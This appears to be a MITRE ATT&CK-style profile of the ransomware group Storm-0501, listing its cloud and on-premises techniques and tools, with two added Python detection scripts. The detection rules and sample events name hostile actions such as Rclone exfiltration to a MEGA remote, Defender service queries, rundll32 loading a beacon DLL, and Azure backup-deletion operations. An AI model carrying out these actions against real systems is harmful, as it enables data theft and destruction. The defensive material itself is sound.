
G1053 Storm-0501

Storm-0501 is a financially motivated cyber criminal group that uses commodity and open-source tools to conduct ransomware operations. Storm-0501 has been active since 2021 and has previously been affiliated with Sabbath Ransomware and other Ransomware-as-a-Service (RaaS) variants such as Hive, BlackCat, Hunters International, LockBit 3.0, and Embargo ransomware.1234

Item Value
ID G1053
Associated Names
Version 1.0
Created 19 October 2025
Last Modified 24 October 2025

Techniques Used

Domain ID Name Use
enterprise T1087 Account Discovery -
enterprise T1087.002 Domain Account Storm-0501 has utilized an obfuscated version of the Active Directory reconnaissance tool ADRecon.ps1 (obfs.ps1 or recon.ps1) to discover domain accounts.2
enterprise T1087.004 Cloud Account Storm-0501 has enumerated users, roles, and resources within victim Azure tenants using the tool AzureHound.3
enterprise T1098 Account Manipulation -
enterprise T1098.001 Additional Cloud Credentials Storm-0501 has reset the password of identified administrator accounts that lack MFA and registered their own MFA method.3
enterprise T1098.003 Additional Cloud Roles Storm-0501 has elevated their access to Azure resources using Microsoft.Authorization/elevateAccess/action and Microsoft.Authorization/roleAssignments/write operations to gain User Access Administrator and Owner Azure roles over the victims’ Azure subscriptions.3
enterprise T1110 Brute Force Storm-0501 has leveraged brute force attacks to obtain credentials.2
enterprise T1580 Cloud Infrastructure Discovery Storm-0501 has enumerated compromised cloud environments to identify critical assets, data stores, and backup resources.3
enterprise T1526 Cloud Service Discovery Storm-0501 has discovered the victim environment’s protections to include Azure policies, resource locks, and Azure Storage immutability policies.3
enterprise T1059 Command and Scripting Interpreter -
enterprise T1059.001 PowerShell Storm-0501 has leveraged PowerShell to execute commands and scripts.23
enterprise T1059.009 Cloud API Storm-0501 has leveraged Cloud CLI to execute commands and exfiltrate data from compromised environments.3
enterprise T1555 Credentials from Password Stores -
enterprise T1555.005 Password Managers Storm-0501 has stolen credentials stored in the password manager KeePass by using Find-KeePassConfig.ps1.2
enterprise T1555.006 Cloud Secrets Management Stores Storm-0501 has utilized Azure Key Vault to store the encryption key using the operation Microsoft.KeyVault/Vaults/write.3
enterprise T1485 Data Destruction Storm-0501 has destroyed data and backup files.3
enterprise T1486 Data Encrypted for Impact Storm-0501 has encrypted files in victim environments using ransomware as a service (RaaS) including Sabbath, Hive, BlackCat, Hunters International, LockBit 3.0 and Embargo ransomware.3
enterprise T1530 Data from Cloud Storage Storm-0501 has modified Azure Storage account resources through the Microsoft.Storage/storageAccounts/write operation to expose storage accounts that were not previously reachable remotely, enabling data exfiltration.3
enterprise T1587 Develop Capabilities -
enterprise T1587.003 Digital Certificates Storm-0501 has utilized their own self-signed TLS certificate “Microsoft IT TLS CA 5” with their infrastructure.4
enterprise T1484 Domain or Tenant Policy Modification -
enterprise T1484.001 Group Policy Modification Storm-0501 distributed Group Policy Objects to tamper with security products.2
enterprise T1484.002 Trust Modification Storm-0501 created a new federated domain within the victim Microsoft Entra tenant using Global Administrator level access to establish a persistent backdoor for later use.23
enterprise T1482 Domain Trust Discovery Storm-0501 has used the native Windows utility Nltest (nltest.exe) for discovery.2
enterprise T1567 Exfiltration Over Web Service -
enterprise T1567.002 Exfiltration to Cloud Storage Storm-0501 has exfiltrated stolen data to the MEGA file sharing site.4 Storm-0501 has also used Rclone to exfiltrate data from victim environments to cloud storage such as MegaSync.2 Storm-0501 has exfiltrated data to their own infrastructure using the AzCopy command-line tool.3
enterprise T1190 Exploit Public-Facing Application Storm-0501 has exploited N-day vulnerabilities in public-facing services to gain initial access to victim environments, including Zoho ManageEngine (CVE-2022-47966), Citrix NetScaler “Citrix Bleed” (CVE-2023-4966), and Adobe ColdFusion 2016 (CVE-2023-29300 or CVE-2023-38203).2
enterprise T1657 Financial Theft Storm-0501 has engaged in double-extortion ransomware: exfiltrating data, contacting victims directly when the primary organization refuses to pay, and posting stolen data on their data leak sites.134
enterprise T1490 Inhibit System Recovery Storm-0501 has deleted snapshots, restore points, storage accounts, and backup services to prevent remediation and restoration.3 Storm-0501 has also impacted Azure resources through the Microsoft.Compute/snapshots/delete, Microsoft.Compute/restorePointCollections/delete, Microsoft.Storage/storageAccounts/delete, and Microsoft.RecoveryServices/Vaults/backupFabrics/protectionContainers/delete operations.3
enterprise T1036 Masquerading -
enterprise T1036.004 Masquerade Task or Service Storm-0501 has utilized Rclone masqueraded as svhost.exe and scvhost.exe.2
enterprise T1556 Modify Authentication Process -
enterprise T1556.009 Conditional Access Policies Storm-0501 has registered their own MFA method, and leveraged a victim hybrid joined server to circumvent Conditional Access Policies.3
enterprise T1578 Modify Cloud Compute Infrastructure -
enterprise T1578.003 Delete Cloud Instance Storm-0501 has conducted mass deletion of cloud data stores and resources from Azure subscriptions.3
enterprise T1027 Obfuscated Files or Information -
enterprise T1027.002 Software Packing Storm-0501 has used Themida to pack Cobalt Strike payloads.4
enterprise T1588 Obtain Capabilities -
enterprise T1588.006 Vulnerabilities Storm-0501 has obtained capabilities to exploit N-day vulnerabilities in public-facing services to gain initial access to victim environments, including Zoho ManageEngine (CVE-2022-47966), Citrix NetScaler “Citrix Bleed” (CVE-2023-4966), and Adobe ColdFusion 2016 (CVE-2023-29300 or CVE-2023-38203).2
enterprise T1003 OS Credential Dumping Storm-0501 has used Impacket's SecretsDump module to dump credentials and obtain account and password information.2
enterprise T1003.006 DCSync Storm-0501 has utilized DCSync to extract credentials from victims.3
enterprise T1057 Process Discovery Storm-0501 has discovered running processes through tasklist.exe.2
enterprise T1219 Remote Access Tools -
enterprise T1219.002 Remote Desktop Software Storm-0501 has used legitimate remote monitoring and management (RMM) tools including AnyDesk, NinjaOne, and Level.io.2
enterprise T1021 Remote Services -
enterprise T1021.006 Windows Remote Management Storm-0501 has utilized the post-exploitation tool known as Evil-WinRM that uses PowerShell over Windows Remote Management (WinRM) for remote code execution.3
enterprise T1021.007 Cloud Services Storm-0501 has used a compromised Entra Connect Sync server to move laterally within the victim environment.3
enterprise T1053 Scheduled Task/Job -
enterprise T1053.005 Scheduled Task Storm-0501 used a scheduled task named “SysUpdate”, registered via GPO on devices in the network, to distribute the Embargo ransomware.2
enterprise T1518 Software Discovery -
enterprise T1518.001 Security Software Discovery Storm-0501 has detected endpoint security solutions using sc query sense and sc query windefend.3
enterprise T1218 System Binary Proxy Execution -
enterprise T1218.010 Regsvr32 Storm-0501 has launched Cobalt Strike Beacon files using regsvr32.exe.2
enterprise T1218.011 Rundll32 Storm-0501 has launched Cobalt Strike Beacon files with rundll32.exe.2
enterprise T1082 System Information Discovery Storm-0501 has leveraged native Windows tools and commands such as systeminfo and open-source tools including OSQuery and ossec-win32 to query details about the endpoint.2
enterprise T1614 System Location Discovery -
enterprise T1614.001 System Language Discovery Storm-0501 has identified the system language code on a compromised host to determine whether the victim falls under a language code excluded from targeting, including those associated with Russia and other Commonwealth of Independent States (CIS) countries, since such victims may draw the attention of law enforcement in countries where the ransomware operators or affiliates reside or operate.14
enterprise T1537 Transfer Data to Cloud Account Storm-0501 has copied data from the victim's environment to their own infrastructure using the AzCopy CLI.3
enterprise T1552 Unsecured Credentials -
enterprise T1552.004 Private Keys Storm-0501 has leveraged the Azure Owner role to access and steal the Storage Account Access keys using the Microsoft.Storage/storageAccounts/listkeys/action operation.3
enterprise T1078 Valid Accounts -
enterprise T1078.004 Cloud Accounts Storm-0501 has leveraged compromised accounts to access Microsoft Entra Connect, which was used to synchronize on-premises identities and Microsoft Entra identities, allowing users to sign into both environments with the same password.2 Storm-0501 has also used the victim Global Administrator account that lacked any registered MFA method to access victim cloud environments.3 Storm-0501 has leveraged Storage Account Access Keys within the victim environment.3
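The Azure-side rows above (T1098.003, T1530, T1555.006, T1490, T1578.003, T1552.004) describe a sequence of Resource Manager operations rather than a single indicator: elevate access, write a role assignment, list storage keys, reconfigure storage, then delete snapshots, restore points, storage accounts and backup containers. The following is an added example written for this page, not Storm-0501 tooling or a Microsoft detection; it triages Azure Activity Log events for that chain by caller and time window. The event layout is a simplified, constructed stand-in for the real Activity Log schema (the real log nests the operation under operationName.value and the outcome under status.value), and the sample events are constructed, not real telemetry.

```python
"""Triage of Azure Activity Log events for the cloud-impact chain documented on
this page: elevate access -> role assignment -> list storage keys -> expose
storage -> delete backup resources.  Added example; record layout is a
simplified, constructed stand-in for the real Activity Log schema."""
from collections import defaultdict
from datetime import datetime, timedelta

# Operation names exactly as listed on this page, grouped by stage.
STAGES = {
    "elevate": {"Microsoft.Authorization/elevateAccess/action"},
    "assign_role": {"Microsoft.Authorization/roleAssignments/write"},
    "steal_keys": {"Microsoft.Storage/storageAccounts/listkeys/action"},
    "expose_storage": {"Microsoft.Storage/storageAccounts/write"},
    "key_vault": {"Microsoft.KeyVault/Vaults/write"},
    "destroy": {
        "Microsoft.Compute/snapshots/delete",
        "Microsoft.Compute/restorePointCollections/delete",
        "Microsoft.Storage/storageAccounts/delete",
        "Microsoft.RecoveryServices/Vaults/backupFabrics/protectionContainers/delete",
    },
}
OP_TO_STAGE = {op: stage for stage, ops in STAGES.items() for op in ops}

# Constructed sample events (not real telemetry).
SAMPLE_EVENTS = [
    {"time": "2025-01-10T02:01:00Z", "caller": "ga@victim.example", "operationName": "Microsoft.Authorization/elevateAccess/action", "status": "Succeeded"},
    {"time": "2025-01-10T02:03:10Z", "caller": "ga@victim.example", "operationName": "Microsoft.Authorization/roleAssignments/write", "status": "Succeeded"},
    {"time": "2025-01-10T02:20:00Z", "caller": "ga@victim.example", "operationName": "Microsoft.Storage/storageAccounts/listkeys/action", "status": "Succeeded"},
    {"time": "2025-01-10T02:21:00Z", "caller": "ga@victim.example", "operationName": "Microsoft.Storage/storageAccounts/write", "status": "Succeeded"},
    {"time": "2025-01-10T03:05:00Z", "caller": "ga@victim.example", "operationName": "Microsoft.Compute/snapshots/delete", "status": "Succeeded"},
    {"time": "2025-01-10T03:06:00Z", "caller": "ga@victim.example", "operationName": "Microsoft.RecoveryServices/Vaults/backupFabrics/protectionContainers/delete", "status": "Succeeded"},
    # Routine administration: one role assignment during business hours.
    {"time": "2025-01-09T14:00:00Z", "caller": "admin@victim.example", "operationName": "Microsoft.Authorization/roleAssignments/write", "status": "Succeeded"},
    # A failed operation must not count toward the chain.
    {"time": "2025-01-10T02:02:00Z", "caller": "svc@victim.example", "operationName": "Microsoft.Compute/snapshots/delete", "status": "Failed"},
]


def parse_time(value):
    return datetime.strptime(value, "%Y-%m-%dT%H:%M:%SZ")


def find_impact_chains(events, window=timedelta(hours=6), min_stages=3):
    """Group successful, page-listed operations per caller and report callers
    whose events inside `window` span at least `min_stages` distinct stages.
    Returns {caller: [stage, ...]} ordered by first occurrence."""
    per_caller = defaultdict(list)
    for ev in events:
        stage = OP_TO_STAGE.get(ev["operationName"])
        if stage and ev.get("status") == "Succeeded":
            per_caller[ev["caller"]].append((parse_time(ev["time"]), stage))
    findings = {}
    for caller, items in per_caller.items():
        items.sort()
        # Slide a window over the caller's events and keep the longest chain.
        for i, (t0, _) in enumerate(items):
            seen = []
            for t, stage in items[i:]:
                if t - t0 > window:
                    break
                if stage not in seen:
                    seen.append(stage)
            if len(seen) >= min_stages and len(seen) > len(findings.get(caller, [])):
                findings[caller] = seen
    return findings


if __name__ == "__main__":
    for caller, stages in find_impact_chains(SAMPLE_EVENTS).items():
        print(caller, "->", " > ".join(stages))
```

The window and stage threshold are tuning knobs: a single roleAssignments/write is normal administration, while elevateAccess followed within hours by key listing and backup deletion by the same caller is the pattern this page documents. A failed destructive call is deliberately ignored here; in production you may want to alert on failed deletions too, since they indicate the attempt even when resource locks or immutability policies (T1526) blocked it.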

Software

ID Name References Techniques
S0677 AADInternals Storm-0501 used the PowerShell module AADInternals to create a backdoor within the victim tenant, allowing the impersonation of any user in the organization and bypassing MFA to sign in to any application, including Office 365.2 Cloud Account:Account Discovery Device Registration:Account Manipulation Cloud Administration Command Cloud Service Discovery PowerShell:Command and Scripting Interpreter Cloud Account:Create Account Data from Cloud Storage Trust Modification:Domain or Tenant Policy Modification Exfiltration Over Alternative Protocol SAML Tokens:Forge Web Credentials Email Addresses:Gather Victim Identity Information Domain Properties:Gather Victim Network Information Hybrid Identity:Modify Authentication Process Multi-Factor Authentication:Modify Authentication Process Modify Registry LSA Secrets:OS Credential Dumping Cloud Groups:Permission Groups Discovery Spearphishing Link:Phishing Spearphishing Link:Phishing for Information Steal Application Access Token Steal or Forge Authentication Certificates Silver Ticket:Steal or Forge Kerberos Tickets Credentials In Files:Unsecured Credentials Private Keys:Unsecured Credentials
S0154 Cobalt Strike Storm-0501 has utilized Cobalt Strike for C2 communications and used a unique “license_id” of “666.”2 Sudo and Sudo Caching:Abuse Elevation Control Mechanism Bypass User Account Control:Abuse Elevation Control Mechanism Parent PID Spoofing:Access Token Manipulation Token Impersonation/Theft:Access Token Manipulation Make and Impersonate Token:Access Token Manipulation Domain Account:Account Discovery DNS:Application Layer Protocol Web Protocols:Application Layer Protocol File Transfer Protocols:Application Layer Protocol BITS Jobs Browser Session Hijacking JavaScript:Command and Scripting Interpreter Visual Basic:Command and Scripting Interpreter PowerShell:Command and Scripting Interpreter Python:Command and Scripting Interpreter Windows Command Shell:Command and Scripting Interpreter Windows Service:Create or Modify System Process Standard Encoding:Data Encoding Data from Local System Protocol or Service Impersonation:Data Obfuscation Data Transfer Size Limits Deobfuscate/Decode Files or Information Asymmetric Cryptography:Encrypted Channel Symmetric Cryptography:Encrypted Channel Exploitation for Client Execution Exploitation for Privilege Escalation File and Directory Discovery Process Argument Spoofing:Hide Artifacts Disable or Modify Tools:Impair Defenses Timestomp:Indicator Removal Ingress Tool Transfer Keylogging:Input Capture Modify Registry Native API Network Service Discovery Network Share Discovery Non-Application Layer Protocol Indicator Removal from Tools:Obfuscated Files or Information Obfuscated Files or Information Office Template Macros:Office Application Startup LSASS Memory:OS Credential Dumping Security Account Manager:OS Credential Dumping Domain Groups:Permission Groups Discovery Local Groups:Permission Groups Discovery Process Discovery Dynamic-link Library Injection:Process Injection Process Hollowing:Process Injection Process Injection Protocol Tunneling Domain Fronting:Proxy Internal Proxy:Proxy Query Registry Reflective Code Loading Remote Desktop Protocol:Remote Services SSH:Remote Services Windows Remote Management:Remote Services SMB/Windows Admin Shares:Remote Services Distributed Component Object Model:Remote Services Remote System Discovery Scheduled Transfer Screen Capture Software Discovery Code Signing:Subvert Trust Controls Rundll32:System Binary Proxy Execution System Network Configuration Discovery System Network Connections Discovery System Service Discovery Service Execution:System Services Pass the Hash:Use Alternate Authentication Material Domain Accounts:Valid Accounts Local Accounts:Valid Accounts Windows Management Instrumentation
S1247 Embargo Storm-0501 has used Embargo for ransomware activities.23 Registry Run Keys / Startup Folder:Boot or Logon Autostart Execution Windows Command Shell:Command and Scripting Interpreter Windows Service:Create or Modify System Process Data Encrypted for Impact Deobfuscate/Decode Files or Information Mutual Exclusion:Execution Guardrails Exploitation for Privilege Escalation File and Directory Discovery Financial Theft Safe Mode Boot:Impair Defenses File Deletion:Indicator Removal Inhibit System Recovery Modify Registry Native API Network Share Discovery Encrypted/Encoded File:Obfuscated Files or Information Process Discovery Scheduled Task:Scheduled Task/Job Selective Exclusion Service Stop System Service Discovery Service Execution:System Services
S0357 Impacket Storm-0501 has used Impacket to extract credentials over the network and from victim devices.2 LLMNR/NBT-NS Poisoning and SMB Relay:Adversary-in-the-Middle Lateral Tool Transfer Network Sniffing NTDS:OS Credential Dumping LSASS Memory:OS Credential Dumping Security Account Manager:OS Credential Dumping LSA Secrets:OS Credential Dumping Kerberoasting:Steal or Forge Kerberos Tickets Ccache Files:Steal or Forge Kerberos Tickets Service Execution:System Services Windows Management Instrumentation
S0039 Net Storm-0501 has used the Net utility on the Windows operating system.23 Domain Account:Account Discovery Local Account:Account Discovery Additional Local or Domain Groups:Account Manipulation Local Account:Create Account Domain Account:Create Account Network Share Connection Removal:Indicator Removal Network Share Discovery Password Policy Discovery Domain Groups:Permission Groups Discovery Local Groups:Permission Groups Discovery SMB/Windows Admin Shares:Remote Services Remote System Discovery System Network Connections Discovery System Service Discovery Service Execution:System Services System Time Discovery
S0359 Nltest Storm-0501 has used the native Windows utility Nltest (nltest.exe) for discovery.2 Domain Trust Discovery Remote System Discovery System Network Configuration Discovery
S1040 Rclone Storm-0501 has utilized Rclone for data exfiltration.2 Archive via Utility:Archive Collected Data Data Transfer Size Limits Exfiltration Over Asymmetric Encrypted Non-C2 Protocol:Exfiltration Over Alternative Protocol Exfiltration Over Unencrypted Non-C2 Protocol:Exfiltration Over Alternative Protocol Exfiltration to Cloud Storage:Exfiltration Over Web Service File and Directory Discovery
S0057 Tasklist Storm-0501 discovered running processes through tasklist.exe.2 Process Discovery Security Software Discovery:Software Discovery System Service Discovery
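Several host-side rows on this page (Rclone masquerading as svhost.exe and scvhost.exe under T1036.004, sc query sense / sc query windefend under T1518.001, and Cobalt Strike Beacon launched through regsvr32.exe and rundll32.exe under T1218.010/.011) reduce to process-creation checks. The following is an added example for this page, not Storm-0501 tooling or a vendor rule. It assumes a Sysmon Event ID 1-style record with Image, OriginalFileName and CommandLine fields; the trusted-directory heuristic for DLL paths and the sample events are the editor's construction, not from the page.

```python
"""Process-creation triage for host-side tradecraft documented on this page:
Rclone masquerading as svhost.exe/scvhost.exe, `sc query sense|windefend`,
and regsvr32/rundll32 loading a DLL from an untrusted path.  Added example;
the event layout is a constructed subset of Sysmon Event ID 1 fields."""
import re
from pathlib import PureWindowsPath

MASQUERADE_NAMES = {"svhost.exe", "scvhost.exe"}   # names reported on this page
LOLBINS = {"regsvr32.exe", "rundll32.exe"}
# Heuristic chosen for this example: DLLs loaded by LOLBins from outside these
# directories are treated as suspicious.  Tune to your estate.
TRUSTED_DLL_DIRS = (
    "c:\\windows\\system32\\",
    "c:\\windows\\syswow64\\",
    "c:\\program files\\",
    "c:\\program files (x86)\\",
)
SC_QUERY = re.compile(r"\bsc(?:\.exe)?\s+query\s+(sense|windefend)\b", re.I)
DLL_ARG = re.compile(r"\"?([a-z]:\\[^\"\s,]+\.dll)\"?", re.I)


def triage(event):
    """Return the list of rule names an event trips (empty list if none)."""
    image = PureWindowsPath(event["Image"]).name.lower()
    orig = (event.get("OriginalFileName") or "").lower()
    cmd = event.get("CommandLine", "")
    hits = []
    # Rule 1: svchost look-alike names, or a binary whose embedded original
    # file name is rclone.exe while it runs under a different name.
    if image in MASQUERADE_NAMES or (orig == "rclone.exe" and image != orig):
        hits.append("masquerade_rclone")
    # Rule 2: sc query against the Defender for Endpoint (sense) or
    # Defender Antivirus (windefend) service.
    if image == "sc.exe" and SC_QUERY.search(cmd):
        hits.append("security_software_discovery")
    # Rule 3: regsvr32/rundll32 loading a DLL from outside trusted directories.
    if image in LOLBINS:
        m = DLL_ARG.search(cmd)
        if m and not m.group(1).lower().startswith(TRUSTED_DLL_DIRS):
            hits.append("lolbin_untrusted_dll")
    return hits


# Constructed sample events, not real telemetry.
SAMPLE_EVENTS = [
    {"Image": r"C:\ProgramData\svhost.exe", "OriginalFileName": "rclone.exe",
     "CommandLine": r"svhost.exe copy C:\Share mega:leak --transfers 8"},
    {"Image": r"C:\Windows\System32\sc.exe", "OriginalFileName": "sc.exe",
     "CommandLine": "sc query sense"},
    {"Image": r"C:\Windows\System32\rundll32.exe", "OriginalFileName": "RUNDLL32.EXE",
     "CommandLine": r"rundll32.exe C:\Users\Public\beacon.dll,Start"},
    # Benign: rundll32 loading a DLL from System32.
    {"Image": r"C:\Windows\System32\rundll32.exe", "OriginalFileName": "RUNDLL32.EXE",
     "CommandLine": r"rundll32.exe C:\Windows\System32\shell32.dll,Control_RunDLL"},
    # Benign: Rclone running under its own name.
    {"Image": r"C:\Tools\rclone.exe", "OriginalFileName": "rclone.exe",
     "CommandLine": "rclone.exe lsd backup:"},
]


def run(events=SAMPLE_EVENTS):
    """Return (image, rules) for every event that trips at least one rule."""
    return [(e["Image"], triage(e)) for e in events if triage(e)]


if __name__ == "__main__":
    for image, rules in run():
        print(image, "->", ", ".join(rules))
```

Rule 1 relies on the OriginalFileName field from the PE version resource, which is why renaming rclone.exe to svhost.exe does not hide it from a Sysmon-equipped host; an attacker who strips the version resource defeats that half of the rule, so the literal look-alike names are kept as a second check.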
